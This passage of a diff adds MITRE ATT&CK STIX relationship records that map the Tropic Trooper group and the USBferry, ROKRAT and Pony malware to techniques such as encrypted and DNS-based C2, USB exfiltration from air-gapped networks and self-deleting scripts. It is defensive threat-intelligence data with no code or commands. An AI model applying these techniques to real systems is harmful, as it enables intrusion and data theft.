+ ],
+ "description": "[Tropic Trooper](https://attack.mitre.org/groups/G0081) has used base64 encoding to hide command strings delivered from the C2.(Citation: TrendMicro Tropic Trooper May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--91180074-16cd-448f-8955-628d06965e22",
+ "type": "relationship",
+ "modified": "2020-05-21T14:55:00.169Z",
+ "created": "2020-05-21T14:55:00.169Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--56319646-eb6e-41fc-ae53-aadfa7adb924",
+ "target_ref": "attack-pattern--5d0d3609-d06d-49e1-b9c9-b544e0c618cb",
+ "external_references": [
+ {
+ "source_name": "TrendMicro Tropic Trooper May 2020",
+ "url": "https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf",
+ "description": "Chen, J.. (2020, May 12). Tropic Trooper\u2019s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020."
+ }
+ ],
+ "description": "[Tropic Trooper](https://attack.mitre.org/groups/G0081) has started a web service in the target host and wait for the adversary to connect, acting as a web shell.(Citation: TrendMicro Tropic Trooper May 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--6a063d3a-cad2-4649-93a4-d1931ae6aaaf",
+ "type": "relationship",
+ "modified": "2020-05-21T14:55:00.172Z",
+ "created": "2020-05-21T14:55:00.172Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--56319646-eb6e-41fc-ae53-aadfa7adb924",
+ "target_ref": "attack-pattern--391d824f-0ef1-47a0-b0ee-c59a75e27670",
+ "external_references": [
+ {
+ "source_name": "TrendMicro Tropic Trooper May 2020",
+ "url": "https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf",
+ "description": "Chen, J.. (2020, May 12). Tropic Trooper\u2019s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020."
+ }
+ ],
+ "description": "[Tropic Trooper](https://attack.mitre.org/groups/G0081) has used multiple Windows APIs including HttpInitialize, HttpCreateHttpHandle, and HttpAddUrl.(Citation: TrendMicro Tropic Trooper May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--73499911-3b9f-443e-b522-f0d1434f2eb6",
+ "type": "relationship",
+ "modified": "2020-05-21T14:55:00.174Z",
+ "created": "2020-05-21T14:55:00.174Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--56319646-eb6e-41fc-ae53-aadfa7adb924",
+ "target_ref": "attack-pattern--b8902400-e6c5-4ba2-95aa-2d35b442b118",
+ "external_references": [
+ {
+ "source_name": "TrendMicro Tropic Trooper May 2020",
+ "url": "https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf",
+ "description": "Chen, J.. (2020, May 12). Tropic Trooper\u2019s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020."
+ }
+ ],
+ "description": "[Tropic Trooper](https://attack.mitre.org/groups/G0081) has encrypted traffic with the C2 to prevent network detection.(Citation: TrendMicro Tropic Trooper May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--3089fe6b-36d6-4890-b70b-1a76f55c84ff",
+ "type": "relationship",
+ "modified": "2020-05-21T14:55:00.182Z",
+ "created": "2020-05-21T14:55:00.182Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--56319646-eb6e-41fc-ae53-aadfa7adb924",
+ "target_ref": "attack-pattern--1996eef1-ced3-4d7f-bf94-33298cabbf72",
+ "external_references": [
+ {
+ "source_name": "TrendMicro Tropic Trooper May 2020",
+ "url": "https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf",
+ "description": "Chen, J.. (2020, May 12). Tropic Trooper\u2019s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020."
+ }
+ ],
+ "description": "[Tropic Trooper](https://attack.mitre.org/groups/G0081)'s backdoor has communicated to the C2 over the DNS protocol.(Citation: TrendMicro Tropic Trooper May 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--af9e92df-d4d0-437a-9114-823b6a2a14a6",
+ "type": "relationship",
+ "modified": "2020-05-21T14:55:00.198Z",
+ "created": "2020-05-21T14:55:00.198Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--56319646-eb6e-41fc-ae53-aadfa7adb924",
+ "target_ref": "attack-pattern--e3b6daca-e963-4a69-aee6-ed4fd653ad58",
+ "external_references": [
+ {
+ "source_name": "TrendMicro Tropic Trooper May 2020",
+ "url": "https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf",
+ "description": "Chen, J.. (2020, May 12). Tropic Trooper\u2019s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020."
+ }
+ ],
+ "description": "[Tropic Trooper](https://attack.mitre.org/groups/G0081)'s backdoor could list the infected system's installed software.(Citation: TrendMicro Tropic Trooper May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--f79c163a-25c0-4694-b1ca-50ab1eda8651",
+ "type": "relationship",
+ "modified": "2020-05-21T14:55:00.229Z",
+ "created": "2020-05-21T14:55:00.229Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--56319646-eb6e-41fc-ae53-aadfa7adb924",
+ "target_ref": "attack-pattern--1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2",
+ "external_references": [
+ {
+ "source_name": "TrendMicro Tropic Trooper May 2020",
+ "url": "https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf",
+ "description": "Chen, J.. (2020, May 12). Tropic Trooper\u2019s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020."
+ }
+ ],
+ "description": "[Tropic Trooper](https://attack.mitre.org/groups/G0081) has hidden payloads in Flash directories and fake installer files.(Citation: TrendMicro Tropic Trooper May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--8a2a70a5-044d-4869-9d11-10499c8848bc",
+ "type": "relationship",
+ "modified": "2020-05-21T16:56:20.619Z",
+ "created": "2020-05-21T14:55:00.231Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--56319646-eb6e-41fc-ae53-aadfa7adb924",
+ "target_ref": "attack-pattern--fdc47f44-dd32-4b99-af5f-209f556f63c2",
+ "external_references": [
+ {
+ "source_name": "TrendMicro Tropic Trooper May 2020",
+ "url": "https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf",
+ "description": "Chen, J.. (2020, May 12). Tropic Trooper\u2019s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020."
+ }
+ ],
+ "description": "[Tropic Trooper](https://attack.mitre.org/groups/G0081) has used known administrator account credentials to execute the backdoor directly.(Citation: TrendMicro Tropic Trooper May 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--95122d43-9de8-4eef-bc46-6fdc5cc276a9",
+ "type": "relationship",
+ "modified": "2020-05-21T18:57:34.554Z",
+ "created": "2020-05-21T14:55:00.233Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--56319646-eb6e-41fc-ae53-aadfa7adb924",
+ "target_ref": "attack-pattern--774a3188-6ba9-4dc4-879d-d54ee48a5ce9",
+ "external_references": [
+ {
+ "source_name": "TrendMicro Tropic Trooper May 2020",
+ "url": "https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf",
+ "description": "Chen, J.. (2020, May 12). Tropic Trooper\u2019s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020."
+ }
+ ],
+ "description": "[Tropic Trooper](https://attack.mitre.org/groups/G0081) has used a copy function to automatically exfiltrate sensitive data from air-gapped systems using USB storage.(Citation: TrendMicro Tropic Trooper May 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--c4f1371c-8f23-49b7-9572-d226ee2dbade",
+ "type": "relationship",
+ "modified": "2020-05-21T14:55:00.235Z",
+ "created": "2020-05-21T14:55:00.235Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--56319646-eb6e-41fc-ae53-aadfa7adb924",
+ "target_ref": "attack-pattern--a3e1e6c5-9c74-4fc0-a16c-a9d228c17829",
+ "external_references": [
+ {
+ "source_name": "TrendMicro Tropic Trooper May 2020",
+ "url": "https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf",
+ "description": "Chen, J.. (2020, May 12). Tropic Trooper\u2019s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020."
+ }
+ ],
+ "description": "[Tropic Trooper](https://attack.mitre.org/groups/G0081) has exfiltrated data using USB storage devices.(Citation: TrendMicro Tropic Trooper May 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--6971d7f3-8161-4399-b587-acab5d8820f1",
+ "type": "relationship",
+ "modified": "2020-05-21T18:57:34.625Z",
+ "created": "2020-05-21T14:55:00.262Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--56319646-eb6e-41fc-ae53-aadfa7adb924",
+ "target_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18",
+ "external_references": [
+ {
+ "source_name": "TrendMicro Tropic Trooper May 2020",
+ "url": "https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf",
+ "description": "Chen, J.. (2020, May 12). Tropic Trooper\u2019s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020."
+ }
+ ],
+ "description": "[Tropic Trooper](https://attack.mitre.org/groups/G0081) has monitored files' modified time.(Citation: TrendMicro Tropic Trooper May 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--78731c00-1f22-4dab-a3cd-d19fac57e82f",
+ "type": "relationship",
+ "modified": "2020-05-21T14:55:00.279Z",
+ "created": "2020-05-21T14:55:00.279Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--56319646-eb6e-41fc-ae53-aadfa7adb924",
+ "target_ref": "attack-pattern--30208d3e-0d6b-43c8-883e-44462a514619",
+ "external_references": [
+ {
+ "source_name": "TrendMicro Tropic Trooper May 2020",
+ "url": "https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf",
+ "description": "Chen, J.. (2020, May 12). Tropic Trooper\u2019s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020."
+ }
+ ],
+ "description": "[Tropic Trooper](https://attack.mitre.org/groups/G0081) has collected information automatically using the adversary's [USBferry](https://attack.mitre.org/software/S0452) attack.(Citation: TrendMicro Tropic Trooper May 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--b3dd4e4e-0bb8-4487-8336-b5d9024045eb",
+ "type": "relationship",
+ "modified": "2020-05-21T14:55:00.281Z",
+ "created": "2020-05-21T14:55:00.281Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--56319646-eb6e-41fc-ae53-aadfa7adb924",
+ "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
+ "external_references": [
+ {
+ "description": "Alintanahin, K. (2015). Operation Tropic Trooper: Relying on Tried-and-Tested Flaws to Infiltrate Secret Keepers. Retrieved June 14, 2019.",
+ "url": "https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-operation-tropic-trooper.pdf",
+ "source_name": "TrendMicro TropicTrooper 2015"
+ },
+ {
+ "source_name": "TrendMicro Tropic Trooper May 2020",
+ "url": "https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf",
+ "description": "Chen, J.. (2020, May 12). Tropic Trooper\u2019s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020."
+ }
+ ],
+ "description": "[Tropic Trooper](https://attack.mitre.org/groups/G0081) has detected a target system\u2019s OS version and system volume information.(Citation: TrendMicro TropicTrooper 2015)(Citation: TrendMicro Tropic Trooper May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--cd5799f3-8be5-4272-88db-626940136130",
+ "type": "relationship",
+ "modified": "2020-05-21T14:55:00.290Z",
+ "created": "2020-05-21T14:55:00.290Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--56319646-eb6e-41fc-ae53-aadfa7adb924",
+ "target_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0",
+ "external_references": [
+ {
+ "source_name": "TrendMicro Tropic Trooper May 2020",
+ "url": "https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf",
+ "description": "Chen, J.. (2020, May 12). Tropic Trooper\u2019s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020."
+ }
+ ],
+ "description": "[Tropic Trooper](https://attack.mitre.org/groups/G0081) has used scripts to collect the host's network topology.(Citation: TrendMicro Tropic Trooper May 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--6512ebc3-cc9f-48e1-9a57-a5deb062f123",
+ "type": "relationship",
+ "modified": "2020-05-21T14:55:00.293Z",
+ "created": "2020-05-21T14:55:00.293Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--56319646-eb6e-41fc-ae53-aadfa7adb924",
+ "target_ref": "attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62",
+ "external_references": [
+ {
+ "source_name": "TrendMicro Tropic Trooper May 2020",
+ "url": "https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf",
+ "description": "Chen, J.. (2020, May 12). Tropic Trooper\u2019s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020."
+ }
+ ],
+ "description": "[Tropic Trooper](https://attack.mitre.org/groups/G0081) has used Windows command scripts.(Citation: TrendMicro Tropic Trooper May 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--702b125c-993e-468f-8ea9-6862048be772",
+ "type": "relationship",
+ "modified": "2020-05-21T14:55:00.295Z",
+ "created": "2020-05-21T14:55:00.295Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--56319646-eb6e-41fc-ae53-aadfa7adb924",
+ "target_ref": "attack-pattern--7e150503-88e7-4861-866b-ff1ac82c4475",
+ "external_references": [
+ {
+ "source_name": "TrendMicro Tropic Trooper May 2020",
+ "url": "https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf",
+ "description": "Chen, J.. (2020, May 12). Tropic Trooper\u2019s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020."
+ }
+ ],
+ "description": "[Tropic Trooper](https://attack.mitre.org/groups/G0081) has tested if the localhost network is available and other connection capability on an infected system using command scripts.(Citation: TrendMicro Tropic Trooper May 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--df7e5314-665b-44a3-8040-f6cb8fd28cbf",
+ "type": "relationship",
+ "modified": "2020-05-21T14:55:00.329Z",
+ "created": "2020-05-21T14:55:00.329Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--56319646-eb6e-41fc-ae53-aadfa7adb924",
+ "target_ref": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c",
+ "external_references": [
+ {
+ "source_name": "TrendMicro Tropic Trooper May 2020",
+ "url": "https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf",
+ "description": "Chen, J.. (2020, May 12). Tropic Trooper\u2019s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020."
+ }
+ ],
+ "description": "[Tropic Trooper](https://attack.mitre.org/groups/G0081) has deleted dropper files on an infected system using command scripts.(Citation: TrendMicro Tropic Trooper May 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--098a760a-66ce-46e0-938e-86518e450a27",
+ "type": "relationship",
+ "modified": "2020-05-21T14:55:00.332Z",
+ "created": "2020-05-21T14:55:00.332Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--60a9c2f0-b7a5-4e8e-959c-e1a3ff314a5f",
+ "target_ref": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c",
+ "external_references": [
+ {
+ "source_name": "NCCGroup RokRat Nov 2018",
+ "url": "https://www.nccgroup.com/uk/about-us/newsroom-and-events/blogs/2018/november/rokrat-analysis/",
+ "description": "Pantazopoulos, N.. (2018, November 8). RokRat Analysis. Retrieved May 21, 2020."
+ }
+ ],
+ "description": "[ROKRAT](https://attack.mitre.org/software/S0240) can request to delete files.(Citation: NCCGroup RokRat Nov 2018)\t",
+ "relationship_type": "uses",
+ "id": "relationship--53c8de3e-f862-44d5-be7e-274e14bdd57e",
+ "type": "relationship",
+ "modified": "2020-05-21T17:07:02.401Z",
+ "created": "2020-05-21T17:07:02.401Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--60a9c2f0-b7a5-4e8e-959c-e1a3ff314a5f",
+ "target_ref": "attack-pattern--3c4a2599-71ee-4405-ba1e-0e28414b4bc5",
+ "external_references": [
+ {
+ "source_name": "NCCGroup RokRat Nov 2018",
+ "url": "https://www.nccgroup.com/uk/about-us/newsroom-and-events/blogs/2018/november/rokrat-analysis/",
+ "description": "Pantazopoulos, N.. (2018, November 8). RokRat Analysis. Retrieved May 21, 2020."
+ }
+ ],
+ "description": "[ROKRAT](https://attack.mitre.org/software/S0240) can request to upload collected host data and additional files.(Citation: NCCGroup RokRat Nov 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--d1a17f31-c62f-4ec3-9a77-41e6a339a657",
+ "type": "relationship",
+ "modified": "2020-05-21T17:07:02.444Z",
+ "created": "2020-05-21T17:07:02.444Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--75bba379-4ba1-467e-8c60-ec2b269ee984",
+ "target_ref": "attack-pattern--7e150503-88e7-4861-866b-ff1ac82c4475",
+ "external_references": [
+ {
+ "source_name": "TrendMicro Tropic Trooper May 2020",
+ "url": "https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf",
+ "description": "Chen, J.. (2020, May 12). Tropic Trooper\u2019s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020."
+ }
+ ],
+ "description": "[USBferry](https://attack.mitre.org/software/S0452) can use netstat and nbtstat to detect active network connections.(Citation: TrendMicro Tropic Trooper May 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--e6cd4568-3c15-4d1d-ab2c-c799141cf34b",
+ "type": "relationship",
+ "modified": "2020-05-29T13:31:07.909Z",
+ "created": "2020-05-21T17:14:56.863Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--75bba379-4ba1-467e-8c60-ec2b269ee984",
+ "target_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
+ "external_references": [
+ {
+ "source_name": "TrendMicro Tropic Trooper May 2020",
+ "url": "https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf",
+ "description": "Chen, J.. (2020, May 12). Tropic Trooper\u2019s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020."
+ }
+ ],
+ "description": "[USBferry](https://attack.mitre.org/software/S0452) can use tasklist to gather information about the process running on the infected system.(Citation: TrendMicro Tropic Trooper May 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--bfad86a1-f8bb-45eb-b7b9-5919ca4ef886",
+ "type": "relationship",
+ "modified": "2020-05-29T13:31:07.914Z",
+ "created": "2020-05-21T17:14:56.882Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--75bba379-4ba1-467e-8c60-ec2b269ee984",
+ "target_ref": "attack-pattern--25659dd6-ea12-45c4-97e6-381e3e4b593e",
+ "external_references": [
+ {
+ "source_name": "TrendMicro Tropic Trooper May 2020",
+ "url": "https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf",
+ "description": "Chen, J.. (2020, May 12). Tropic Trooper\u2019s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020."
+ }
+ ],
+ "description": "[USBferry](https://attack.mitre.org/software/S0452) can use net user to gather information about local accounts.(Citation: TrendMicro Tropic Trooper May 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--0bbf5be7-e1de-419e-85ee-afaa431f60be",
+ "type": "relationship",
+ "modified": "2020-05-29T13:31:07.950Z",
+ "created": "2020-05-21T17:14:56.884Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--75bba379-4ba1-467e-8c60-ec2b269ee984",
+ "target_ref": "attack-pattern--e358d692-23c0-4a31-9eb6-ecc13a8d7735",
+ "external_references": [
+ {
+ "source_name": "TrendMicro Tropic Trooper May 2020",
+ "url": "https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf",
+ "description": "Chen, J.. (2020, May 12). Tropic Trooper\u2019s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020."
+ }
+ ],
+ "description": "[USBferry](https://attack.mitre.org/software/S0452) can use net view to gather information about remote systems.(Citation: TrendMicro Tropic Trooper May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--15a571d1-652c-4148-9dee-12d3b1cbff62",
+ "type": "relationship",
+ "modified": "2020-05-29T13:31:07.953Z",
+ "created": "2020-05-21T17:14:56.887Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--222ba512-32d9-49ac-aefd-50ce981ce2ce",
+ "target_ref": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c",
+ "external_references": [
+ {
+ "source_name": "Malwarebytes Pony April 2016",
+ "url": "https://blog.malwarebytes.com/threat-analysis/2015/11/no-money-but-pony-from-a-mail-to-a-trojan-horse/",
+ "description": "hasherezade. (2016, April 11). No money, but Pony! From a mail to a trojan horse. Retrieved May 21, 2020."
+ }
+ ],
+ "description": "[Pony](https://attack.mitre.org/software/S0453) has used scripts to delete itself after execution.(Citation: Malwarebytes Pony April 2016)\t",
+ "relationship_type": "uses",
+ "id": "relationship--f2810da3-1a6f-4c48-826d-929bde7f7af3",
+ "type": "relationship",
+ "modified": "2020-05-21T21:31:34.107Z",
+ "created": "2020-05-21T21:31:34.107Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--222ba512-32d9-49ac-aefd-50ce981ce2ce",
+ "target_ref": "attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62",
+ "external_references": [
+ {
+ "source_name": "Malwarebytes Pony April 2016",
+ "url": "https://blog.malwarebytes.com/threat-analysis/2015/11/no-money-but-pony-from-a-mail-to-a-trojan-horse/",
+ "description": "hasherezade. (2016, April 11). No money, but Pony! From a mail to a trojan horse. Retrieved May 21, 2020."
+ }
+ ],
+ "description": "[Pony](https://attack.mitre.org/software/S0453) has used batch scripts to delete itself after execution.(Citation: Malwarebytes Pony April 2016)\t",
+ "relationship_type": "uses",
+ "id": "relationship--404f482d-160d-47ea-9eff-5ca7392eb5b2",
+ "type": "relationship",
+ "modified": "2020-05-21T21:31:34.133Z",
+ "created": "2020-05-21T21:31:34.133Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--222ba512-32d9-49ac-aefd-50ce981ce2ce",
+ "target_ref": "attack-pattern--25659dd6-ea12-45c4-97e6-381e3e4b593e",
+ "external_references": [
+ {
+ "source_name": "Malwarebytes Pony April 2016",
+ "url": "https://blog.malwarebytes.com/threat-analysis/2015/11/no-money-but-pony-from-a-mail-to-a-trojan-horse/",
+ "description": "hasherezade. (2016, April 11). No money, but Pony! From a mail to a trojan horse. Retrieved May 21, 2020."
+ }
+ ],
+ "description": "[Pony](https://attack.mitre.org/software/S0453) has used the NetUserEnum function to enumerate local accounts.(Citation: Malwarebytes Pony April 2016)\t",
+ "relationship_type": "uses",
+ "id": "relationship--d5ecfa68-2027-4dd5-adf0-1eb82463cfc5",
+ "type": "relationship",
+ "modified": "2020-05-21T21:31:34.148Z",
+ "created": "2020-05-21T21:31:34.148Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--222ba512-32d9-49ac-aefd-50ce981ce2ce",
+ "target_ref": "attack-pattern--09c4c11e-4fa1-4f8c-8dad-3cf8e69ad119",
+ "external_references": [
+ {
+ "source_name": "Malwarebytes Pony April 2016",
+ "url": "https://blog.malwarebytes.com/threat-analysis/2015/11/no-money-but-pony-from-a-mail-to-a-trojan-horse/",
